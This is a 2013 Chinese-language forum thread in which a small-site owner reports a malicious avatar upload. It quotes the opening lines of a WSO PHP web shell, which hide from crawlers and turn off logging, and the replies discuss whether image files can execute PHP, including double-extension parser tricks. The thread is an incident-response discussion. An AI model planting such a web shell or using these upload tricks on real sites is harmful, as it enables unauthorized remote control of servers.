V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
GASALA
V2EX  ›  站长

小站被挂马了。。。

  •  
  •   GASALA · 2013-03-11 18:02:10 +08:00 · 3850 次点击
    这是一个创建于 4304 天前的主题,其中的信息可能已经有所发展或是发生改变。
    一个小论坛,用的是thinksaas,对方注册账号,上传头像(伪装木马),直接打头像网址显示部分代码如下:

    <?php # Web Shell by oRb
    $auth_pass = md5("123456");
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';

    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
    }

    @session_start();
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.4');

    ....................

    请问怎样判断对方是否拿到了权限呢?
    10 条回复    1970-01-01 08:00:00 +08:00
    jimmy2010
        1
    jimmy2010  
       2013-03-11 18:15:11 +08:00
    这样的木马是不起作用的吧,代码都没运行
    GASALA
        2
    GASALA  
    OP
       2013-03-11 18:21:32 +08:00
    @jimmy2010 打开那个人注册的页面杀软会弹出提示。。。

    我只贴出了一部分代码。。。你的意思是他这个马没有执行吗?
    icevil
        3
    icevil  
       2013-03-11 18:39:46 +08:00
    @GASALA 杀软是特征码识别,所以会弹出提示。
    除非你设置了.jpg等图片后缀解析为php,否则这样的静态文件是不会执行的吧。
    GASALA
        4
    GASALA  
    OP
       2013-03-11 18:45:43 +08:00
    @icevil 谢谢。这方面白痴。

    如果不能执行,那对方上传这段代码的意图是什么呢?
    icevil
        5
    icevil  
       2013-03-11 19:28:29 +08:00
    @GASALA 估计测试漏洞什么的吧,具体还要上传的人来回答。。
    你后台查询上传这头像的账号的ip然后block啊~
    jybox
        6
    jybox  
       2013-03-11 19:37:24 +08:00
    这个黑阔很可能已经得手了,现在他可以远程执行命令,至于是root权限还是www-data的权限,要看你的服务器的权限配置.

    他很可能在不止一个文件中挂了后门.
    GASALA
        7
    GASALA  
    OP
       2013-03-11 19:47:56 +08:00
    @jybox 对比之后没发现有系统文件被修改过。。。我已经删除了那个伪装的文件。

    请问怎样知道有没有登入过root或者怎么知道对方是否拥有了权限?
    jimmy2010
        8
    jimmy2010  
       2013-03-11 22:00:47 +08:00
    @jybox
    @GASALA
    不用惊慌,jpg格式的文件在可解析php的服务器上是不会被解析的。对方在测试能否上传木马而已,除非将木马以.php格式上传,才有可能执行。或者利用php的解析漏洞,上传成XX.php.rar之类的,也可以执行。总之,纯图片不用担心,不管图片的内容是什么,只要确保.jpg这个后缀无法修改就行
    1314258
        9
    1314258  
       2013-03-11 22:35:38 +08:00 via iPhone
    别以为jpg不会执行。
    notsobad
        10
    notsobad  
       2013-03-12 00:34:36 +08:00   ❤️ 1
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5872 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 01:57 · PVG 09:57 · LAX 17:57 · JFK 20:57
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.